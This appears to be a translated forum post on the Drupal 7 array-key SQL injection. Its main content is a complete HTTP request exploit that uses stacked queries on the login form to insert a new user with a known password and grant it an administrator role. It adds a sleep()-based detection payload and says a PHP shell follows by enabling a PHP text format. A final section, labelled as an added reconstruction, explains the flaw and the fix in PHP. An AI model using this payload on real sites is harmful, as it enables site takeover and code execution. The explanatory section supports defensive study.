The vulnerability principle has already been covered on drops: the array keys are concatenated into the SQL statement, so the injection goes through the key, and pdo_mysql can execute multiple SQL statements at once. Getting a shell is also simple: add a text format that allows PHP syntax, then post an article and write PHP code in it directly. I've seen many people discussing how to execute SQL when there is a table prefix, so here is a PoC that adds an administrator regardless of the table prefix.
POST /cms/drupal/drupal7/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 294

name[0%20;insert+into+{users}+(uid,name,pass,status)+values+(333333,'tes3333','$S$DrxHxKj6w11uEr04c1mBk.zeoEDoVgklllN2A3AOOJvooOfiqn9Y',1);insert+into+{users_roles}+(uid,rid)+values(999999999,3);#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
The password is testss. `users` is written as `{users}`, the same way `#@__members` is used in DedeCMS SQL statements, so the real table prefix is filled in by the application. To test for the vulnerability you can use select sleep(999999999999999999999999).
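As an added illustration (my own simplified reconstruction, not Drupal's code and not part of the original post), this shows why the array key ends up inside the SQL: the placeholder expansion builds new placeholder names from the caller's keys, and the 7.32-style fix re-indexes the array first. The function names expand_vulnerable and expand_fixed and the sample query are assumptions for the demo.

```php
<?php
// Simplified reconstruction of Drupal 7's placeholder expansion for array
// arguments (":name" => [...]), reduced to the query-rewriting step only.

// Vulnerable pattern: the request-controlled array KEY ($i) is concatenated
// into the placeholder name, and the placeholder list is pasted into the SQL
// text. Whatever is in the key therefore becomes part of the statement that
// pdo_mysql executes, and pdo_mysql will run stacked statements.
function expand_vulnerable(string $query, array $args): string {
    foreach (array_filter($args, 'is_array') as $key => $data) {
        $new_keys = [];
        foreach ($data as $i => $value) {          // $i is attacker-controlled
            $new_keys[$key . '_' . $i] = $value;
        }
        $query = preg_replace('#' . $key . '\b#',
                              implode(', ', array_keys($new_keys)), $query);
    }
    return $query;
}

// Fixed pattern (as in Drupal 7.32): array_values() re-indexes the data, so
// $i is always 0, 1, 2, ... no matter which keys the request supplied.
function expand_fixed(string $query, array $args): string {
    foreach (array_filter($args, 'is_array') as $key => $data) {
        $new_keys = [];
        foreach (array_values($data) as $i => $value) {
            $new_keys[$key . '_' . $i] = $value;
        }
        $query = preg_replace('#' . $key . '\b#',
                              implode(', ', array_keys($new_keys)), $query);
    }
    return $query;
}

// {users} is a Drupal table placeholder; the prefix is applied later by the
// connection, which is why the PoC above never needs to know the prefix.
$sql = "SELECT * FROM {users} WHERE name IN (:name) AND status = 1";

// Constructed sample: a harmless non-numeric key with the same shape as the
// name[...] parameter in the request above (a real exploit puts SQL there).
$args = [':name' => ['0 OR 1' => 'test']];

echo "vulnerable: ", expand_vulnerable($sql, $args), "\n";
echo "fixed:      ", expand_fixed($sql, $args), "\n";
```

Running it shows the key text surviving into the placeholder list in the vulnerable version, while the fixed version only ever emits `:name_0`, which is why validating or re-indexing keys, rather than escaping values, is the relevant mitigation here.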